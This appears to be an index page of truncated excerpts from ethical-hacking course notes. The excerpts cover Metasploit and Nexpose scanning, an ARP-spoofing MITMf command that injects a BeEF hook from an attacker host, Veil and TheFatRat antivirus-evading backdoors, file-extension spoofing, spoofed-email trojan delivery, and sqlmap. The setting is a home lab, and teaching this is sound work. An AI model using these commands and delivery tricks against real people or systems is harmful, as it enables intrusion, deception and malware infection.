Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not require user interaction, all we need is a target IP! Start with information gathering, find open ports, OS, installed services, and work from there. (2)Cl…

CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000…

Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database using the above cr…

CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the properties of the file. The file type of a trojan is application(.exe) , even if it looks like jpg\PDF or other files. Is it what it seems to be? Check Net…

CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL. DNS spoof requests to a page containing the hook. Inject the hook in brows…

CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract targets. (e.g. Maltego, Google ... etc.) Send an email pretending to be a friend. Online Tool: https://anonymousemail.me/ Ask them to open a link, downl…

CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a suitable one. Make the trojan even more trustable. We will use an old trick using the "right to left overload" character. 1. Open up the character…

Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable Metasploit backdoors. Uses a different method to evade AV programs. Generates executable binary backdoors for: Windows Mac OS Linux Android Install a…

CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to…

CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backdoor is a file that gives us full control over the machine that it gets executed on. Backdoors can be caught by Anti-Virus programs. Veil is a framewor…

CLIENT SIDE ATTACKS - Social Engineering Social Engineering Information gathering Tool: Maltego Gathering Information About Target's Facebook Account, Twitter Account(Friends, Followers...), Email, Phone Number, etc.…

CLIENT SIDE ATTACKS Social Engineering Gather info about the user(s). Build a strategy based on the info. Build a backdoor based on the info.…

CLIENT SIDE ATTACKS Protecting against smart delivery methods Ensure you're not being MITM'ed -> use trusted networks, xarp. Only download from HTTPS pages. Check file MD5 after download.  http://www.winmd5.com/…

CLIENT SIDE ATTACKS Backdoor delivery method2 - backdooring exe downloads Backdoor any exe the target downloads. We need to be in the middle of the connection. Install bdfproxy following the guide on the website - https://packages.debian.org/sid/all/…

CLIENT SIDE ATTACKS - Listening for connections 1. Run Metasploit Move the backdoor file to the webserver folder. And download it on the target machine. msfconsole 2. Use the handler module. use exploit/multi/handler 3. Set payload. set PAYLOAD[veil…

CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interaction. Social engineering can be very useful. Information gathering is vital. Generating an undetectable backdoor using VEIL-EVASION https://github.com…

Server Side Attack Nexpose - Analysing Scan Results and Generating Reports OS and Software Inforation. Services Information HTTP Service Detailed Information. Vulnerability Information Vulnerabilities list: Detailed Vulnerability Information - Affect…

Server Side Attacks NeXpose - configure and launch a scan Configure and initialize the application. Browse https://localhost:3780 and active the system. Create site and configure the settings. Info&security Assets: Authentication(Not a must) Template…

Server Side Attacks - NEXPOSE NeXpose is a vulnerability management framework, it allows us to discover, assess and act on discovered vulnerabilities, it also tells us a lot of info about the discovered vulnerabilities, whether they are exploitable a…

Server Side Attack Install Metasploit cummunity/pro and active it. Create a new project for the target - Mestaploitable machine and start the scan. Start the scan task. You can modify the advanced settings. But it is not a must. Launch scan and wait…

SERVER SIDE ATTACKS - METASPLOIT Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks. > msfconsole - runs the…

Sever side attacks code execution Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x. We find the following vulnerability and try to use it.  https://www.rapid7.com/db/modules/exploit/multi/samba/…

Server Side Attacks - INFORMATION GATHERING Need an IP address. Very simple if target is on the same network (netdiscover or zenmap). If target has a domain, then a simple ping will return its IP. > ping www.XXXX.com Getting the IP is tricker if the…

What is Hacking? Gaining unauthorized access. Hackers? 1.Black-hat Hackers 2.White-hat Hackers 3.Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem.…

Hacking is gaining unauthorized access to anything. Preparation Setting up a lab and installing needed applications and operating systesm. Basics about computers and linux systems. Network Pentesting Test the security of networks and computers cnnect…

INFORMATION GATHERING IP address. Domain name Info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois Lookup - Find info about the owner of the target. () -> http://whois.domaintools…

Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking WEP is old encryption, but it is still used in some networks, therefore we will explain how to break it. It uses an algorithm called RC4 where each pac…

Pre--Connection-Attacks that can be done before connecting to the network. Gaining Access - How to break Wi-Fi keys(WEP/WPA/WPA2) Post-Connection-Attacks can be done after connecting to the network. Detection&Security - detect and prevent the above a…

Ethical Hacking Tutorials Free Ethical Hacking Tutorials https://www.guru99.com/ethical-hacking-tutorials.html Types of Hackers Ethical Hacker (White hat) Cracker (Black hat) Grey hat Script kiddies Hacktivist Phreaker https://www.guru99.com/what-is-…

SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…